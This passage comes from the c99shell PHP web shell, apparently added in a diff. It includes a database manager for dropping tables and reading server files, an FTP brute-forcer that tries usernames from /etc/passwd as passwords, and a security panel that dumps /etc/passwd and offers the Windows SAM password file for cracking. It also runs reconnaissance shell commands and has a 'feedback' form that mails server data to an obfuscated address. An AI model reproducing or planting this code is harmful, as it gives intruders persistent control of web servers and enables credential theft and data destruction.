href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>+</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; + } + echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></center></form>"; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" 